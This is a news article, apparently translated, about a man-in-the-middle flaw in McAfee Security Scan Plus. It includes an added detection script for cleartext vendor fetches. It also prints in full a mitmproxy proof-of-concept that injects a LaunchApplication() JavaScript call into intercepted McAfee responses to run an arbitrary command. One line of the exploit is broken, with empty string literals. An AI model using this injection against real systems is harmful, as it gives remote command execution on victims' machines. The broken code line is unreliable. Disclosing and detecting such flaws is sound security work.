McAfee Security Scan Plus: On this site you have read many times about security companies' negligence. Now it is McAfee's turn. The company is reportedly fixing a bug in its free Security Scan Plus tool, which retrieves information from users' computers over HTTP, that is, in plain text.
The company seems to have forgotten what it preaches, or assumed it was out of the question that anyone would think of man-in-the-middle attacks against its services, such as the free online scan, but also the in-app ads and the UI that displays them.
The vulnerability was discovered by SecuriTeam, which reports that McAfee's tool "retrieves information from various mcafee.com domains and displays it to the user, usually in the application's main window".
Since HTTPS is not used to transport this information, an attacker can modify it in transit and then abuse the library the tool relies on to render it (MCBRWSR2.DLL) to display whatever HTML content he wishes.
This library exposes the JavaScript LaunchApplication() API, which, put simply, means that an attacker can execute any command he wants on the victim's machine.
After every scan, McAfee Security Scan Plus displays a UI element indicating the target's "protection level", loaded from the following URL:
http://home.mcafee.com/SecurityScanner/SSBanner.aspx
This information is shown on the online scan's progress screen, so the user can easily believe that his computer is clean when in fact it has just been compromised.
If you now put yourself in the attacker's shoes and perform a MITM attack, it is quite easy to run commands with the privileges of the logged-in user, which in many cases is an account with administrator rights.
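Detection-side example, added here and not part of the article or of McAfee's code: it scans a constructed proxy-style request log for the two conditions the article describes, a cleartext HTTP fetch from a mcafee.com host whose response is content the embedded browser will render or execute (HTML or JavaScript). The log format and the helper names are assumptions.

```python
import re
from urllib.parse import urlparse

VENDOR_DOMAIN = "mcafee.com"                      # domain named in the article
ACTIVE_TYPES = ("text/html", "text/javascript")  # content an embedded browser renders/executes

# Constructed sample log (not real traffic): method, URL, status, content-type.
SAMPLE_LOG = """\
GET http://home.mcafee.com/SecurityScanner/SSBanner.aspx 200 text/html; charset=utf-8
GET http://home.mcafee.com/SecurityScanner/scripts/ui.js 200 text/javascript
GET https://home.mcafee.com/SecurityScanner/SSBanner.aspx 200 text/html; charset=utf-8
GET http://home.mcafee.com/images/logo.png 200 image/png
GET http://example.com/ 200 text/html
"""

LINE_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) (?P<ctype>.*)$")


def is_vendor_host(host, domain=VENDOR_DOMAIN):
    """True for the domain itself or any subdomain.

    A bare endswith("mcafee.com") test would also accept hosts such as
    notmcafee.com, so match on the label boundary instead.
    """
    host = host.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


def find_cleartext_active_content(log_text, domain=VENDOR_DOMAIN):
    """Return (url, mime) pairs fetched over plain HTTP from the vendor domain
    whose response body is HTML or JavaScript, i.e. content that a MITM could
    alter to reach the embedded browser's scripting surface."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not follow the assumed log format
        url = m.group("url")
        parsed = urlparse(url)
        if parsed.scheme != "http" or not is_vendor_host(parsed.hostname or "", domain):
            continue
        mime = m.group("ctype").split(";")[0].strip().lower()  # drop charset parameter
        if mime in ACTIVE_TYPES:
            findings.append((url, mime))
    return findings


if __name__ == "__main__":
    for url, mime in find_cleartext_active_content(SAMPLE_LOG):
        print(f"[!] cleartext active content: {mime} from {url}")
```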
The complete PoC needs only 38 lines of code. McAfee acknowledged the issue here and fixed it in the service in July.
The PoC code:
#!/usr/bin/env python3
#
# HTTP proxy mode:
#   mitmproxy -s mcsploit_inline.py --ignore '.*'
#
# Transparent proxy mode:
#   mitmproxy -s mcsploit_inline.py -T
#
from mitmproxy import ctx, http
import requests
import time

COMMAND = "c:\\\\windows\\\\system32\\\\calc.exe"
CMDARGS = ""


def response(flow):
    if flow.request.scheme == "http" and (flow.request.headers['host'].endswith("mcafee.com") or "mcafee" in flow.request.url):
        if flow.response.status_code == 302:
            ctx.log("[+] [MCSPLOIT] Insecure McAfee request found! (HTML)")
            https_url = flow.request.url.replace("http://", "https://")
            r = requests.get(https_url, headers=flow.request.headers, verify=False)
            if "text/html" not in r.headers['content-type']:
                return
            contents = r.text
            # The two string literals on the next line (the HTML fragment being
            # replaced and its replacement) did not survive the page's extraction
            # and are left exactly as found.
            contents = contents.replace("", "" % (COMMAND, CMDARGS))
            flow.response = http.HTTPResponse.make(200, bytes(contents, encoding="utf-8"), {"Content-Type": "text/html; charset=utf-8", "Expires": "-1"})
            return
        try:
            if flow.response.headers["content-type"] == "text/javascript":
                ctx.log("[+] [MCSPLOIT] Insecure McAfee request found! (JS)")
                inject = "try{window.external.LaunchApplication(\"%s\", \"%s\");}catch(launchapperr){var x;}\n" % (COMMAND, CMDARGS)
                try:
                    flow.response.contents = inject + flow.response.contents
                except AttributeError:
                    ctx.log("[-] [MCSPLOIT] No content in the original response!")
                    pass
        except KeyError:
            pass